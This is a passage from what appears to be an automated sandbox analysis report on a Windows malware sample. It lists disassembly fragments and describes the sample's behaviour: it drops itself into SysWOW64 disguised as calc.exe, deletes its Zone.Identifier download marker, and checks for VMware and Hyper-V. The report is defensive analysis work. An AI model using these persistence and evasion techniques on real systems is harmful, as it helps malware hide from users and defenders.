                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00835EF0 push ecx; mov dword ptr [esp], 000066B1h0_2_00835EF1
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00835E10 push ecx; mov dword ptr [esp], 0000AF8Ah0_2_00835E11
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00835E40 push ecx; mov dword ptr [esp], 00002B63h0_2_00835E41
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00835F90 push ecx; mov dword ptr [esp], 0000765Fh0_2_00835F91
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00835F50 push ecx; mov dword ptr [esp], 00000282h0_2_00835F51
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007E304F push ecx; ret 0_2_007E3062
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007E3646 push ecx; ret 0_2_007E3659
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007DD6DB push ecx; retf 0_2_007DD6F0
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D77DE push ecx; mov dword ptr [esp], 00004180h0_2_007D77DF
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D783E push ecx; mov dword ptr [esp], 0000ECEBh0_2_007D783F
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D78EE push ecx; mov dword ptr [esp], 000097F2h0_2_007D78EF
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D788E push ecx; mov dword ptr [esp], 0000DEB7h0_2_007D788F
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D794E push ecx; mov dword ptr [esp], 0000F636h0_2_007D794F
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007DD948 push edi; retf 0_2_007DD94D
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D79DE push ecx; mov dword ptr [esp], 00002B63h0_2_007D79DF
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D79AE push ecx; mov dword ptr [esp], 0000AF8Ah0_2_007D79AF
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D7A1E push ecx; mov dword ptr [esp], 00002BE4h0_2_007D7A1F
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D7AEE push ecx; mov dword ptr [esp], 00000282h0_2_007D7AEF
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D7A8E push ecx; mov dword ptr [esp], 000066B1h0_2_007D7A8F
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D7B2E push ecx; mov dword ptr [esp], 0000765Fh0_2_007D7B2F
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_0040C244 push eax; retn 0040h0_2_0040C245
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_0040D9F7 push ecx; ret 0_2_0040DA07
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_0040BB40 push eax; ret 0_2_0040BB54
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_0040BB40 push eax; ret 0_2_0040BB7C
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_0040BF04 push eax; ret 0_2_0040BF22
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00835CA0 push ecx; mov dword ptr [esp], 0000ECEBh0_2_00835CA1
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00835CF0 push ecx; mov dword ptr [esp], 0000DEB7h0_2_00835CF1
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00835C40 push ecx; mov dword ptr [esp], 00004180h0_2_00835C41
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00835DB0 push ecx; mov dword ptr [esp], 0000F636h0_2_00835DB1
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00835D50 push ecx; mov dword ptr [esp], 000097F2h0_2_00835D51
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00835E80 push ecx; mov dword ptr [esp], 00002BE4h0_2_00835E81
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00835EF0 push ecx; mov dword ptr [esp], 000066B1h0_2_00835EF1
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00835E10 push ecx; mov dword ptr [esp], 0000AF8Ah0_2_00835E11
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00835E40 push ecx; mov dword ptr [esp], 00002B63h0_2_00835E41
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00835F90 push ecx; mov dword ptr [esp], 0000765Fh0_2_00835F91
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00835F50 push ecx; mov dword ptr [esp], 00000282h0_2_00835F51
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007E304F push ecx; ret 0_2_007E3062
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007E3646 push ecx; ret 0_2_007E3659
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007DD6DB push ecx; retf 0_2_007DD6F0
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D77DE push ecx; mov dword ptr [esp], 00004180h0_2_007D77DF
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D783E push ecx; mov dword ptr [esp], 0000ECEBh0_2_007D783F
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D78EE push ecx; mov dword ptr [esp], 000097F2h0_2_007D78EF
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D788E push ecx; mov dword ptr [esp], 0000DEB7h0_2_007D788F
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D794E push ecx; mov dword ptr [esp], 0000F636h0_2_007D794F
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007DD948 push edi; retf 0_2_007DD94D
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D79DE push ecx; mov dword ptr [esp], 00002B63h0_2_007D79DF
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D79AE push ecx; mov dword ptr [esp], 0000AF8Ah0_2_007D79AF
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D7A1E push ecx; mov dword ptr [esp], 00002BE4h0_2_007D7A1F
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D7AEE push ecx; mov dword ptr [esp], 00000282h0_2_007D7AEF
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D7A8E push ecx; mov dword ptr [esp], 000066B1h0_2_007D7A8F
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_007D7B2E push ecx; mov dword ptr [esp], 0000765Fh0_2_007D7B2F

                Persistence and Installation Behavior:

                barindex
                Drops executables to the windows directory (C:\Windows) and starts themShow sources
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeExecutable created and started: C:\Windows\SysWOW64\udhisapi\calc.exeJump to behavior
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeExecutable created and started: C:\Windows\SysWOW64\udhisapi\calc.exeJump to behavior
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exePE file moved: C:\Windows\SysWOW64\udhisapi\calc.exeJump to behavior
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exePE file moved: C:\Windows\SysWOW64\udhisapi\calc.exeJump to behavior

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeFile opened: C:\Windows\SysWOW64\udhisapi\calc.exe:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeFile opened: C:\Windows\SysWOW64\udhisapi\calc.exe:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_004010FA IsIconic,0_2_004010FA
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00401307 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,0_2_00401307
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00404FF9 IsIconic,GetWindowPlacement,GetWindowRect,0_2_00404FF9
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_004010FA IsIconic,0_2_004010FA
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00401307 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,0_2_00401307
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00404FF9 IsIconic,GetWindowPlacement,GetWindowRect,0_2_00404FF9
                Source: C:\Windows\SysWOW64\udhisapi\calc.exeCode function: 1_2_004010FA IsIconic,1_2_004010FA
                Source: C:\Windows\SysWOW64\udhisapi\calc.exeCode function: 1_2_00401307 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,1_2_00401307
                Source: C:\Windows\SysWOW64\udhisapi\calc.exeCode function: 1_2_00404FF9 IsIconic,GetWindowPlacement,GetWindowRect,1_2_00404FF9
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\udhisapi\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\udhisapi\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\udhisapi\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\udhisapi\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\udhisapi\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\udhisapi\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\udhisapi\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\udhisapi\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\udhisapi\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\udhisapi\calc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,0_2_00834F20
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,0_2_00834F20
                Source: C:\Windows\System32\svchost.exe TID: 6064Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 6064Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00439132 lstrlenA,FindFirstFileA,FindClose,0_2_00439132
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00437C5A __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,0_2_00437C5A
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_008337E0 FindFirstFileW,GetProcessHeap,GetProcessHeap,FindNextFileW,FindClose,0_2_008337E0
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00439132 lstrlenA,FindFirstFileA,FindClose,0_2_00439132
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_00437C5A __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,0_2_00437C5A
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_008337E0 FindFirstFileW,GetProcessHeap,GetProcessHeap,FindNextFileW,FindClose,0_2_008337E0
                Source: C:\Windows\SysWOW64\udhisapi\calc.exeCode function: 1_2_00439132 lstrlenA,FindFirstFileA,FindClose,1_2_00439132
                Source: C:\Windows\SysWOW64\udhisapi\calc.exeCode function: 1_2_00437C5A __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,1_2_00437C5A
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_0040B946 VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,0_2_0040B946
                Source: C:\Users\user\Desktop\QgWIrI5nvn.exeCode function: 0_2_0040B946 VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,0_2_0040B946
                Source: svchost.exe, 00000003.00000002.508930823.00000202E1061000.00000004.00000001.sdmpBinary or memory string: "@Hyper-V RAW
                Source: svchost.exe, 00000002.00000002.257419702.000002ECAF140000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.292541714.000001897BA60000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.507203580.000001D22AF40000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.305679370.000001BACFE80000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: svchost.exe, 00000003.00000002.506139904.00000202DB82A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW`S
                Source: calc.exe, 00000001.00000002.507137958.000000000258A000.00000004.00000001.sdmp, svchost.exe, 00000003.00000002.508890012.00000202E104C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000002.00000002.257419702.000002ECAF140000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.292541714.000001897BA60000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.507203580.000001D22AF40000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.305679370.000001BACFE80000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: svchost.exe, 00000002.00000002.257419702.000002ECAF140000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.292541714.000001897BA60000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.507203580.000001D22AF40000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.305679370.000001BACFE80000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                So